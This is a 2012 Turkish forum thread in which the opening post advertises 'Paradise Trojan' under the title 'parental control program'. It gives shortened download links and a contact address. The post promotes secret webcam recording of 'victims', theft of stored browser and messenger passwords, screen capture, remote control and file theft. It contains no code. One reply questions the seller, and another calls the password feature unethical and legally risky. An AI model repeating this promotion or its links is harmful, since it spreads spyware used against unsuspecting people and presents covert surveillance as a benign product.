Ebeveyn Kontrol Programı

yasin1299
28-07-2012, 15:56   |  #1  
OP Taze Üye
Teşekkür Sayısı: 0
11 mesaj
Kayıt Tarihi:Kayıt: Tem 2012

Site Linki:http://paradisetrojan.blogspot.com/

[/url]

Kurbanın webcamından sınırsız kayıt alın - kontrolü elinize alın

[url=http://bit.ly/c25MCx]

Bütün şifreler elinizin altında

[/url]

Opera,google chrome,mozilla firefox,internet explorer,safari,msn messenger ve yahoo messenger ve diğer tüm popüler programların şifrelerini ışık hızında çözün ve anında bilgisayarınıza kopyalayın.

Gold versiyonda oyun şifreleri için özel server seçenekleri bulunmaktadır.

Ekran görüntülerini yakalayın - an be an sunulan görüntüler

[url=http://bit.ly/c25MCx]

Bazen bir görüntü bin kelimeye bedeldir. Kurbanlarınız hangi saatte hangi işlemleri yapmış bilgisayarınızın başında an be an takip edin.

Uzaktan yönetim modülü ile karşı bilgisayarların başına geçin.

[/url]

Yüksek hızda dosya transferleri

[url=http://bit.ly/c25MCx]

Bilgisayarın dosyalarını kurcalayın, beğendiklerinizi kendinize kopyalayın ya da kendi dosyalarınızı karşı tarafa yollayın.

EKSTRA:

Ses yollayın,site açın,siteleri yasaklatın, mause ile oynayın,klavyesinden yazın,cd bölümünü açın-kapatın,bilgisayarı kapatın-resetleyin ve daha pek çok özellik.

Paradise Trojanın kullanımı son derece kolaydır. Dilerseniz programı üyelik bile oluşturmadan hemen kullanmaya başlayabilirsiniz.Tek tıkla kurulumsuz çalıştırın,tek tıkla server oluşturun, tek tıkla tüm işlemleri halletmenin keyfine varın.

Kurulum ihtiyacı duymaz. Firewall'ı ayarlamanıza, 3.parti yazılımların eklentilerine, no-ip'lerde üyelik oluşturmanıza ya da modem ayarlarıyla gereksiz vakit kaybetmenize gerek kalmaz. Dilerseniz programı üyelik bile oluşturmadan hemen kullanmaya başlayabilirsiniz.

Gold versiyon kullanıcılarına kendilerine verdiğimiz numara üzerinden 7/24 canlı destek verilmektedir Ayrıca teamwiever üzerinden doğrudan yardım seçeneği de sunulmaktadır.

Deneme sürümünü kullananlar ise [email]cemsheetx@gmail.com[/email] facebook/e-posta adresinden bizimle iletişim geçebilirler.

Ayda en az 2 defa yapılan güncellemeler sayesinde yazılımınıza her gün yeni özellikler eklendiğini göreceksiniz. Üstelik güncellemelerin tamamı isteğe bağlı ve de ücretsiz.

İzmirlifare
28-07-2012, 16:32   |  #2  
İzmirlifare avatarı
Yıllanmış Üye
Teşekkür Sayısı: 37
1,391 mesaj
Kayıt Tarihi:Kayıt: Ara 2011

hocam programı siz mi yazdınız yoksa dağıtıcı firma siz misiniz ?

black_flood
28-07-2012, 19:38   |  #3  
black_flood avatarı
Yıllanmış Üye
Teşekkür Sayısı: 152
5,190 mesaj
Kayıt Tarihi:Kayıt: May 2006

bu yazılımın benzerinden bende satıyorum fakat içerdiği yetenekler hiçte etik değil özelliklen şifre kısmı çok saçma sattığım yerlerde direk şifre alma olayını körlüyorum yazılımın yoksa başa bela. bunun yerine alternatif olarak gelecek linux server  vermeyi tercih sebebi olarak görüyorum ve en azından gerçek bir log server olmuş oluyor ne idüğü belirsiz 3. parti yazılımlar  yasal yönden bazen büyük sorunlara sebebiyet verebiliyor.